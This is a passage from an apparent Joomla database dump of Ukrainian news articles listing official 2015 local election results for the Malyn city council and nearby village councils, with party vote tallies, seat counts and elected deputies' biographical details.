1pt; border-style: none none none solid; border-color: -moz-use-text-color -moz-use-text-color -moz-use-text-color windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 09.02.1977 р., освіта вища, безпартійний, Гранітненська селищна рада, Селищний голова, місце проживання: Житомирська обл., Малинський р-н, смт Гранітне</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt medium medium; border-style: solid solid none none; border-color: windowtext windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Чоповицька селищна рада</span></td>\r\n<td style=\"width: 82.85pt; border-width: 1pt 1pt medium; border-style: solid solid none; border-color: windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Філоненко Михайло Миколайович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium medium; border-style: solid none none; border-color: windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium medium 1pt; border-style: solid none none solid; border-color: windowtext -moz-use-text-color -moz-use-text-color windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 21.11.1976 р., освіта вища, безпартійний, Чоповицька с/р, голова, місце проживання: Житомирська обл., Малинський р-н, смт. Чоповичі</span></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,61,'2015-10-31 09:40:42',430,'','2015-11-01 06:00:47',430,0,'0000-00-00 00:00:00','2015-10-31 09:40:42','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,5,'','',1,1228,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(1225,1490,'ЦВК: офіційні дані по Малинській міській раді','tsvk-ofitsijni-dani-po-malinskij-miskij-radi','<p><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Житомирська обл., Малинська міська рада</span></strong></p>\r\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"1\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 80%; padding: 0.75pt;\" width=\"80%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Кількісний склад ради</span></strong></td>\r\n<td style=\"width: 20%; padding: 0.75pt;\" width=\"20%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">34</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80%; padding: 0.75pt;\" width=\"80%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Кількість обраних</span></strong></td>\r\n<td style=\"width: 20%; padding: 0.75pt;\" width=\"20%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">34</span></strong></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: right;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">&nbsp;Загальні відомості про результати голосування&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em><span style=\"text-decoration: underline;\">станом на 14.00 год 04.11.2015 року</span></em></span></p>\r\n<table style=\"border: 1pt solid windowtext;\" border=\"1\" cellpadding=\"0\" cellspacing=\"1\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 70%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"70%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Найменування партії</span></strong></td>\r\n<td style=\"width: 10%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"10%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">К-сть голосів, поданих за місцеву організацію політичної партії</span></strong></td>\r\n<td style=\"width: 10%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"10%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">К-сть отриманих депутатських мандатів</span></strong></td>\r\n<td style=\"width: 10%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"10%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">К-сть отриманих депутатських мандатів, що залишились вакантними</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">ПАРТІЯ \"БЛОК ПЕТРА ПОРОШЕНКА \"СОЛІДАРНІСТЬ\"</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">2730</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">13</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">політична партія Всеукраїнське об&rsquo;єднання \"Батьківщина\"</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">1950</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">9</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Народна Партія</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">837</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">4</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">ПОЛІТИЧНА ПАРТІЯ \"УКРАЇНСЬКЕ ОБ&rsquo;ЄДНАННЯ ПАТРІОТІВ &ndash; УКРОП\"</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">521</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">3</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Політична партія \"Сила людей\"</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">703</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">3</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Радикальна партія Олега Ляшка</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">480</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">2</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Політична Партія \"Опозиційний блок\"</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">311</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Політична партія \"Нова держава\"</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">213</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">політична партія Всеукраїнське об&rsquo;єднання \"Свобода\"</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">422</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Патріотична партія України</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">380</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">0</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">&nbsp;Відомості про обраних</span></p>\r\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"1\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 80%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"80%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Найменування партії</span></strong></td>\r\n<td style=\"width: 10%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"10%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Кількість обраних</span></strong></td>\r\n<td style=\"width: 10%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"10%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">%</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">ПАРТІЯ \"БЛОК ПЕТРА ПОРОШЕНКА \"СОЛІДАРНІСТЬ\"</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">13</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">38.24</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">політична партія Всеукраїнське об&rsquo;єднання \"Батьківщина\"</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">9</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">26.47</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Народна Партія</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">4</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">11.76</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">ПОЛІТИЧНА ПАРТІЯ \"УКРАЇНСЬКЕ ОБ&rsquo;ЄДНАННЯ ПАТРІОТІВ &ndash; УКРОП\"</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">3</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">8.82</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Політична партія \"Сила людей\"</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">3</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">8.82</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Радикальна партія Олега Ляшка</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">2</span></strong></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">5.88</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"1\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 5%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"5%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">№ ТВО за яким закріплено</span></strong></td>\r\n<td style=\"width: 20%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"20%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Прізвище, ім\'я, по батькові</span></strong></td>\r\n<td style=\"width: 65%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"65%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; &nbsp; Відомості</span></strong></td>\r\n<td style=\"width: 5%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"5%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Голосів ЗА у ТВО</span></strong></td>\r\n<td style=\"width: 5%; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"5%\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">&nbsp;&nbsp; %</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\" style=\"border-width: 1pt 1pt medium; border-style: solid solid none; border-color: windowtext windowtext -moz-use-text-color; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; &nbsp; ПАРТІЯ \"БЛОК ПЕТРА ПОРОШЕНКА \"СОЛІДАРНІСТЬ\"</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">16</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Мороз Віталій Вікторович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 21.10.1982 р., освіта вища, член ПАРТІЇ \"БЛОК ПЕТРА ПОРОШЕНКА \"СОЛІДАРНІСТЬ\", ТОВ металобази \"Будметінвест\", директор, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">166</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">56,8493</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">14</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Мороз Галина Іванівна</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянка України, народилася 22.08.1959 р., освіта професійно-технічна, безпартійна, пенсіонер, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">130</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">56,0345</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">31</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Прокопчук Валерій Володимирович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 27.03.1958 р., освіта вища, безпартійний, Малинське стоматологічне об&rsquo;єднання, лікар-стоматолог, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">116</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">48,5356</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">15</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Данелян Давид Дарчоєвич</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 26.09.1953 р., освіта вища, безпартійний, ФОП, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">131</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">43,9597</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">28</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Карпенко Сергій Васильович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 21.07.1982 р., освіта вища, безпартійний, Малинське РКП з технічної інвентаризації Житомирської облради, начальник, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">161</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">41,7098</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">10</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Лісовський Юрій Володимирович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 14.12.1967 р., освіта вища, безпартійний, ТОВ \"Юнігран\", начальник дробарно-сортувального цеху, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">113</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">37,6667</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">24</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Гуцалюк Ольга Михайлівна</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянка України, народилася 26.06.1958 р., освіта загальна середня, член ПАРТІЇ \"БЛОК ПЕТРА ПОРОШЕНКА \"СОЛІДАРНІСТЬ\", ТОВ \"МалинЕнер-гоінвест\", оператор КНС №2, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">126</span></td>\r\n<td 